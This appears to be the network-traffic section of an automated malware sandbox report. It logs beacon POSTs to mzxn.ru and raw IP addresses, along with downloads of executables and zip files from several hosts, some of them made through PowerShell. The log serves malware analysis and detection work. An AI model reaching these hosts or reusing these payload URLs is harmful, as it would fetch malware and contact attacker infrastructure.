                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uqfmsjorvfs.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 332Host: mzxn.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tcmckmrwfkcun.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 148Host: mzxn.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bhwagrsoolcnla.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 180Host: mzxn.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kjroavoygfbpsdwi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 346Host: mzxn.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mvqckdwrharucrcg.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 250Host: mzxn.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mouvjsinrynjyai.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 325Host: mzxn.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tbyklxggimhnmx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 249Host: mzxn.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xnfvpysrwik.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 258Host: mzxn.ru
                  Source: global trafficHTTP traffic detected: GET /systemd.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 77.221.157.163
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ipccodalkut.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 183Host: mzxn.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kuebqjlbbtfbj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 355Host: mzxn.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jtflrtuktjsvucm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 173Host: mzxn.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cpopopnbritilda.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 363Host: mzxn.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://topqgimihpqwm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 156Host: mzxn.ru
                  Source: global trafficHTTP traffic detected: GET /win.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 64.190.113.113
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oafowudievrov.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 257Host: mzxn.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://elufhismjek.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 343Host: mzxn.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://khpnbaaufwo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 253Host: mzxn.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://svsbhghbajavukge.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 244Host: mzxn.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://imbyndnwddlepn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 302Host: mzxn.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gturrgitewwfodad.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 218Host: mzxn.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jtjyrojvaxip.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 339Host: mzxn.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yldujrgvckqrx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 262Host: mzxn.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://luwfiaifgqhasu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 268Host: mzxn.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://caikuwutundsm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 367Host: mzxn.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gbpatnncurmtwi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 137Host: mzxn.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uscjenooturcoqoa.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 188Host: mzxn.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://grdkefqyouewk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 191Host: mzxn.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cygkjkiviqedpm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 159Host: mzxn.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qomfulqdiho.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 212Host: mzxn.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vjfcjpfahwpvryik.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 201Host: mzxn.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kxorbjsgbgmdfrl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 175Host: mzxn.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uyxucdsovulqgtjk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 190Host: mzxn.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ibglipwvpfkcey.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 364Host: mzxn.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ocdcprhbwfbxhxuk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 294Host: mzxn.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pkmludkekcakr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 171Host: mzxn.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lybbhvahdtjryena.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 295Host: mzxn.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pdbeoiobqtywre.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 362Host: mzxn.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://htnaerjwhiw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 132Host: mzxn.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bhwqpbeenxy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 129Host: mzxn.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wdxtdkqyiajmua.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 197Host: mzxn.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ehjigvnhybkqlwa.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 282Host: mzxn.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://odshsrqjavtmlfdu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 261Host: mzxn.ru
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.221.157.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.221.157.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.221.157.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.221.157.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.221.157.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
                  Source: global trafficHTTP traffic detected: GET /wp-content/images/pic1.jpg HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: mussangroup.com
                  Source: global trafficHTTP traffic detected: GET /setups.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: funrecipebooks.com
                  Source: global trafficHTTP traffic detected: GET /microgods/raw HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-CH) WindowsPowerShell/5.1.19041.1682Host: rentry.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /download/direct/6b24ec97-2a8d-468d-a24d-c8081cda1dab/vm.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: store4.gofile.ioConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /download/direct/0656c5cf-51b4-4fa4-ae48-8ee5ed3d142e/lm.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: store4.gofile.io
                  Source: global trafficHTTP traffic detected: GET /systemd.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 77.221.157.163
                  Source: global trafficHTTP traffic detected: GET /win.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 64.190.113.113
                  Source: global trafficDNS traffic detected: DNS query: mzxn.ru
                  Source: global trafficDNS traffic detected: DNS query: mussangroup.com
                  Source: global trafficDNS traffic detected: DNS query: funrecipebooks.com
                  Source: global trafficDNS traffic detected: DNS query: rentry.co
                  Source: global trafficDNS traffic detected: DNS query: callosallsaospz.shop
                  Source: global trafficDNS traffic detected: DNS query: store4.gofile.io
                  Source: unknownHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 10591
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 12:52:26 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 85 e5 Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 12:52:26 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 85 e5 Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 12:52:28 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
